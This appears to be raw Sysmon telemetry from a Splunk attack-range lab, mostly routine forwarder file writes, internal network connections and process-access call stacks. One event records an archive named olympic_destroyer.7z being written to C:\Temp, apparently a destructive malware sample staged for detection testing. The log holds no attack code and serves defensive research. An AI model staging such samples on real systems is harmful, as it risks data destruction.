Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000289615Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:25.964{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289614Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:25.949{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF82f7f4.TMPMD5=C788ACA089D90F3A1A6EC3105767DB64,SHA256=342A88EE39B2F3B46C5FF775B5CA8B205D1F4E2D15CC4151DC918B0596F20C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289613Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:25.796{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4230BA4E8418A3FC9787232181A4A0D,SHA256=3EBDA1D6A33E75C5925B1FEE7B42B739607BF97FFB89FF79E393D566F891B8AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217441Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:23.608{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51395-false10.0.1.12-8000- 23542300x8000000000000000217440Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:25.427{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73493E18BDA609ADE6FA8757B6BAD19A,SHA256=55B1FC6E8A90BA6031B60DDC10825504F63B3BC5B8B1087E7BF9DEBE8C0AA6F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217442Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:26.615{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E1A5D67FBD706ECAAC49EF6898C4A2A,SHA256=9F558BEF75660623D8CC969123EE4746CF1056206D6B430E9A67F0A42643886D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289617Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:26.811{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D452BA50890B1FB44A14960BFA6B154,SHA256=73AC7DDF4464A3C0D5D97CC47CDD66FE36E454EA976EB9351B3EBC8EF79F42C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217443Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:27.818{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07191CA29CB2E6629C763E342C9D8A7B,SHA256=FFBD7FBD3036830062E4A09CD3B2099FA8091FBFF6EA05A21E8B28D0C2CA829E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289618Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:27.833{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59B5F34932AD2B9F6C466EDB59C8DE2C,SHA256=58D62B1442605AA73C4E78EF77CBE14A2529DEA334E54CC55F8CBFA99F55C5CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289619Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:28.849{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=266B5782ABBE4172E9ECA4A52B518ECD,SHA256=1D32BAF00E4AC0435C8FEAE83AECF248060F6E0AAE598AABFC8B04D0F5EDC434,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217444Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:28.833{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFFE1F3E84FE75B199E111BD1AB9A793,SHA256=152741E867D970EF638889ED1828BD9EE16C4CD4BF3AF3F0C48A4F74C71AC15A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289620Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:29.879{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F3F92C6B18C51CBA863CD0885358FA8,SHA256=64A2DC7AE7830B18F45EBFE5B051B654568B81E709FB1983BF745ABFFF7F129F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217445Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:29.849{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47C5F2C53838BEC5811A4E15EB3C4483,SHA256=3D5793FAFB228A7D13C3B37D3B0835413215ED665681CC0F1EA0B2473E895037,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289622Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:30.880{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=370F59B1F43896E76BF3656532248788,SHA256=3DB29B4F97E53B7174B51C071547E412E5C19BC519C636425392086CD8F67442,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217447Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:30.864{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BA6716CF47C69A625CB18B95205EE01,SHA256=9313AC8437F7E4FB78BBD80146B0042F54E1AC2ADE3131C0670E7942D1E46F80,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289621Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:28.522{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53544-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000217446Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:30.333{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=1B13928BCE08846BA1F8682D4A9C9639,SHA256=2DB95FEB8A2F4033B033F10F6E39202B992EDD27B17D1981C675C7159DEBB68C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217449Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:31.880{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F561F994DAE27CD7AD9FCE2FC9A2DF58,SHA256=977984C52C7379DEB09A48A3EAA7E03018B4084EEF1C3523C4D6E1B685BFACFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289623Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:31.895{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C080928B520ABE2B76C5CC1CAFB0724F,SHA256=A652FD57EEF334E79AC95D7CFEAEBDE6CEE09122D502767704C1723FED07208E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217448Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:29.639{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51396-false10.0.1.12-8000- 23542300x8000000000000000289625Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:32.912{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F05010D37347960BD6B814737E21A41,SHA256=C25296603BA33227913DE7A80E3962C59EDA255A5B1A2C801A79DB30A527185C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217450Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:32.896{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2189E91B4BD75BA574083C8B5A0B47F,SHA256=C10FB70E04091D5092F069BCD0DFD4AA51DC615044F607763F45306A025F16E3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289624Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:32.782{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289629Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:33.912{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08C65662B01F21EBD46BC5325B3A83F0,SHA256=16995DCDA213F421851205B5B8A74A17EE3CA997B2987F5758BAF95F6C45E4B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217451Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:33.911{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F89875270BBB13D390BE7D84F2DE2FD8,SHA256=D14C5C16B58BA55148C989DDBB06A0B04048E31C793BD619D473CB57C84F8DC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289628Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:33.550{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289627Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:33.366{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=F053EE482CF6034314EF9D2C0FA08CB2,SHA256=E89FF4E2480927AD03EBCEB5E6104A1EF6D8AC0B58E53D6E983CF2ADEB97CA50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289626Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:33.234{C8EA50B7-F2AD-6215-C000-000000003802}4856ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Temp\olympic_destroyer.7zMD5=C575F2C7686A7DE017519FD9FDFB629C,SHA256=90E8F575884AB0A23C93D24837140476EE5AF5D3A132C1025BDD81ED3A5CF1FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289630Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:34.912{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DFE15B13DF1754C5C2EF96A22FF3FCB,SHA256=66A3C60295BA5E299D5BFE83F0CF603495C9C9337066CA4C92D2F0D83F33166E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217452Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:34.927{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0978301247FFB5D848BE1E55FA130157,SHA256=F6CE8CEEE2239648266DF805D0ECBD2C489CB203B76CA6070C3BE53A52953973,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217453Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:35.942{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABB61975C711F41FC5A165802A0C00AD,SHA256=6647BAC0341A6BAEAB6DEA4C95074418F30BD016AF09DD9F96F2A413BEA04260,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289633Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:35.913{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F006D1DEB91AAF786911772C2F26D8F,SHA256=DCDBF98C052C8C8B1F7F1977AB2C8F4A4421D6D2E13C2629A7286841E03E0922,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289632Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:33.670{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53545-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000289631Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:35.168{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289634Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:36.935{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79A447512CBE5D862E16DE2B57F0DC38,SHA256=92BDD129D3B4BF61899CE65B489121CD3B549193047C295605E1A51CB3E1510D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289635Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:37.951{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A622A5075D69AD58B9018D16ABA9141F,SHA256=8E070BE02C762638F7FB426090A2B68864D28F90CFEBF3321178E033CDDD9BE3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217455Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:34.685{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51397-false10.0.1.12-8000- 23542300x8000000000000000217454Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:37.176{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F395AD43B51CE30EAE35482B32022F4,SHA256=864753685A7044EEA981F8117AAC0EDF9F080CAFDD2195C9001A5E3EC7C4D0E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289636Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:38.981{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4A1E3526053FC521FB9AF31A523E48D,SHA256=0974C9B82DC53B74488D82A2617BDB971984BDF1E00F74B124975E04079104BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217456Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:38.192{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7F2A7A1EB9B55B613031E29AF1DF5EB,SHA256=9FA05B66F87E3F8AB77D479F3A25E5142C8817CD2488E25F0382F40FF38F1219,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289638Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:39.983{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD799F7EACF35DA1E2E970E6EAEB1C07,SHA256=B3E3498BE81C3A2B980B3618B67B711F5EAA1C39A3CC5B2254661090ECA5698D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289637Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:39.936{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217457Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:39.208{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22612689E5F9F113F08D73DDB5A1A4BD,SHA256=738826E5C2D8D38410A0D84C471962DAABB285783350BB32FE94945C040E257B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289639Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:40.984{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB019ED9E8C6BA56992FA462BB0A4539,SHA256=39B8887BE82D56304720FE740467256330FE828C7729B51798D5EB5FDBFD3096,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217458Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:40.223{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40C7B48C8A9BA3BC52DB240EB6DADB73,SHA256=DCEB98315EC49A4D564CC14B363290FAE96F4F7E3F7406F9C4E702994897D33D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217459Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:41.317{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00E255B8CA29E641B7B33CB3D6C4BDA7,SHA256=E08F8BC5FBB1F77C01C4005F2173BCC4D3967697AB6B5702755ACB8CC23ED2DB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289648Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:39.657{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53547-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000289647Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 